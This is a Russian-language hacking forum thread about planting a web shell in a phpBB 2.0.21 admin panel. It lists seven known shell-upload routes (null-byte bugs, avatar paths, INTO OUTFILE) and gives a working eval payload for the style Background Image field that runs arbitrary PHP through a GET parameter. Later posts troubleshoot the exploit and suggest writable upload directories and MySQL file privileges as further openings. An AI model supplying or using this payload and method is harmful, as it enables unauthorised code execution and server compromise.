Старый 10.04.2014, 12:29   #1
Белый Тигр
 
Аватар для Белый Тигр
 
Регистрация: 29.08.2010
Сообщений: 144
Репутация: 25
Unhappy Шелл в phpBB 2.0.21 с патченным PHP

Есть админка с phpBB 2.0.21, требуется залить шелл. Нашёл в сети список из 7 способов это сделать:
  • Через highlight багу (пропатчено)
  • Через стили (пропатчено)
  • Через язык интерфейса (пропатчено)
  • Бага в профиле с нулевым байтом в user_sig_bb_code_uid (пропатчено)
  • Через изменение пути аватара (пропатчено в PHP - с copy() нульбайт не срабатывает)
  • Создание файла через mysql с помощью восстановления БД (INTO OUTFILE - нет прав на запись в веб-директорию)
  • Через user_sig_bbcode_uid с помощью восстановления БД (пропатчено в PHP - не обрабатываются регулярки с null-байт + Warning)
У пользователя MySQL есть права на чтение/запись файлов, но скрипты работают от имени отдельного пользователя и в его директорию MySQL`ю путь закрыт.
Существуют ли ещё какие-нибудь способы влить туда шелл?
Белый Тигр вне форума   Ответить с цитированием
Старый 12.04.2014, 13:21   #2
Лаврушкин
 
Регистрация: 05.07.2010
Сообщений: 27
Репутация: 15
По умолчанию

Если стили взять например. там theme_info.cfg хотябы правится?(по стандартным путям) права на запись есть? Edit Theme работает?
Лаврушкин вне форума   Ответить с цитированием
Старый 13.04.2014, 20:52   #3
Белый Тигр
 
Аватар для Белый Тигр
 
Регистрация: 29.08.2010
Сообщений: 144
Репутация: 25
По умолчанию

Спасибо! Видел способ с theme_info.cgf, но там было описано создание этого файла в /tmp, добавление новых стилей и прочее. Отмёл его сразу т.к. 21 уже в коде проверят имена тем. А оказывается я был совсем рядом
Идём в редактирование текущего стиля, в фоновую картинку (можно в другой параметр, но этот никак не отражается на теме из моего случая) вписываем "{${eval($_GET[chr(122)])}}", производим её экспорт и можно обращаться к ссылке добавления нового стиля передавая в параметре z нужный php-код.
Белый Тигр вне форума   Ответить с цитированием
Старый 22.05.2014, 22:38   #4
beau
 
Регистрация: 04.04.2014
Сообщений: 18
Репутация: 0
По умолчанию

Цитата:
Сообщение от Белый Тигр Посмотреть сообщение
Спасибо! Видел способ с theme_info.cgf, но там было описано создание этого файла в /tmp, добавление новых стилей и прочее. Отмёл его сразу т.к. 21 уже в коде проверят имена тем. А оказывается я был совсем рядом
Идём в редактирование текущего стиля, в фоновую картинку (можно в другой параметр, но этот никак не отражается на теме из моего случая) вписываем "{${eval($_GET[chr(122)])}}", производим её экспорт и можно обращаться к ссылке добавления нового стиля передавая в параметре z нужный php-код.
Вписал код, сделал экспорт, при переходе по ссылке admin_styles.php?mode=addnew&z=phpinfo(); ничего не происходит( пропатчено?

Помогите залиться ребята) Ситуация схожая:
Бага в профиле с нулевым байтом в user_sig_bb_code_uid (пропатчено)
Через изменение пути аватара (пропатчено в PHP - с copy() нульбайт не срабатывает)
Создание файла через mysql с помощью восстановления БД (INTO OUTFILE - нет прав на запись в веб-директорию)
Через user_sig_bbcode_uid с помощью восстановления БД (пропатчено в PHP - не обрабатываются регулярки с null-байт + Warning)

единственное не понял что за способы:
Через стили
Через язык интерфейса

Последний раз редактировалось beau; 22.05.2014 в 22:55..
beau вне форума   Ответить с цитированием
Старый 13.04.2014, 21:39   #5
madhatter
 
Регистрация: 11.01.2014
Сообщений: 86
Репутация: 1
По умолчанию

Выполнение кода в стилях, как уже сказали, не бага, а фича phpbb. Некоторые без нее просто не работают, но не забудьте включить эту опцию. Если у вас file_priv на запись от мускула, у вас, вероятно, root\dba. Возможен вариант с соседями. Также стоит проверять диру для загрузки аватар, на нее по доброй традиции часто ставят 777.
madhatter вне форума   Ответить с цитированием
Старый 23.05.2014, 00:09   #6
Белый Тигр
 
Аватар для Белый Тигр
 
Регистрация: 29.08.2010
Сообщений: 144
Репутация: 25
По умолчанию

В какое поле вписывали и что там сейчас при редактировании?
Белый Тигр вне форума   Ответить с цитированием
Старый 23.05.2014, 01:40   #7
beau
 
Регистрация: 04.04.2014
Сообщений: 18
Репутация: 0
По умолчанию

В поле Background Image: вписал {${eval($_GET[chr(122)])}}, потом сделал экспорт, получил ответ что всё прошло успешно, сейчас там отображается
Цитата:
{${eval($_GET[chr(122)])}}
beau вне форума   Ответить с цитированием
Старый 23.05.2014, 08:21   #8
Белый Тигр
 
Аватар для Белый Тигр
 
Регистрация: 29.08.2010
Сообщений: 144
Репутация: 25
По умолчанию

Стиль активен в данный момент?
Если нет, то сделайте тоже самое с активным стилем.
Код сработает только когда форум подгрузит его конфиг, а конфиг он подгружает только у активного стиля.
По-моему проблема в этом.
Белый Тигр вне форума   Ответить с цитированием
Старый 23.05.2014, 18:39   #9
beau
 
Регистрация: 04.04.2014
Сообщений: 18
Репутация: 0
По умолчанию

Стиль всего один и он выбран в конфигурации.
beau вне форума   Ответить с цитированием
Старый 23.05.2014, 18:42   #10
Белый Тигр
 
Аватар для Белый Тигр
 
Регистрация: 29.08.2010
Сообщений: 144
Репутация: 25
По умолчанию

Проверьте внесены ли ваши изменения в конфиг темы:
/templates/[THEME_NAME]/theme_info.cfg
Может просто экспорт как-то криво прошёл
Белый Тигр вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра
Комбинированный вид Комбинированный вид

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot